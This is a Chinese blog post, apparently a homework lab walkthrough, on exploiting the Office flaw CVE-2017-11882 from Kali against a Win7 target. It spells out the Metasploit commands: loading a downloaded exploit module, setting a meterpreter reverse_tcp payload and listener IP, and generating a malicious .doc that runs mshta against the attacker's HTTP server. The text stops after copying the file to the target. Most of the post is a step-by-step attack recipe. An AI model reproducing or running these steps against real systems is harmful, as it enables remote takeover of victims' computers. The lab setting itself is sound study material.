网络与安全|【网络安全作业】office漏洞检测与利用 office漏洞|入侵系统|网络安全

注：可以在kali中打开此博客，所有的命令行直接拖动即可，无需自己手敲，一方面是为了方便，一方面是防止不留意写错，可能导致前功尽弃。

目录
一、下载与设置
1、操作系统下载
【网络与安全|【网络安全作业】office漏洞检测与利用】2、操作系统安装
3、脚本及cve文件下载
4、文件转存
二、操作
1、打开metasploit
2、查找cve模块
3、使用cve模块
4、运行-exploit -j
5、生成恶意doc文件
6、打开文件
7、Kali查看
8、入侵操作
三、注意点
一、下载与设置 1、操作系统下载我们用到win7及kali操作系统，用win7做目标机，并安装好带有漏洞的office。用kali做攻击机。
2、操作系统安装安装kali虚拟机。安装教程参考：

https://blog.csdn.net/shuiyixin/article/details/101021285

安装win7。
3、脚本及cve文件下载 Python脚本：https://github.com/Ridter/CVE-2017-11882。脚本用于生成恶意文件。

文章图片

cve文件：https://github.com/0x09AL/CVE-2017-11882-metasploit。

文章图片

4、文件转存把下载的cve_2017_11882.rb文件复制到如下目录：

/usr/share/metasploit-framework/modules/exploits/windows/smb/

把下载的cve_2017_11882.rtf放到如下目录：

/usr/share/metasploit-framework/data/exploits/

通过命令行可以查看，如下：

文章图片

二、操作 1、打开metasploit 点击metasploit图标打开软件。

文章图片

2、查找cve模块使用命令查找对应的模块：

search cve_2017_11882

文章图片

3、使用cve模块

文章图片

使用exploit

use exploit/windows/smb/cve_2017_11882

首先使用命令设置payload为反弹tcp。

set payload windows/meterpreter/reverse_tcp

其次使用命令设置攻击机的ip(可以使用ifconfig查看)。

set lhost 192.168.72.130

再使用命令设置URI的路径（注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径）

set URIPATH test

最后检查配置。

show options

4、运行-exploit -j

文章图片

5、生成恶意doc文件在桌面右键打开一个终端，把Command109b_CVE-2017-11882.py复制到桌面，为了方便，可以将文件改个名字cve.py，运行命令python cve.py -c "mshta http://192.168.72.130:8080/test" -o test4.doc生成恶意doc文件。

文章图片

这里要注意：

Python系统自带，无需自己再下载；
http://192.168.0.110:8080/test：是路径。前面的“192.168.72.130”是ip地址，可以通过ifconfig查看；8080是端口，固定的；test是前面设置的URIPATH，前面设置是什么，这里就写什么。
test4是文件名，可以自己设置的。

6、打开文件复制文件到目标机打开。我复制的方式是使用优盘，从kali虚拟机存到外接优盘，再从外接优盘转存到win7虚拟机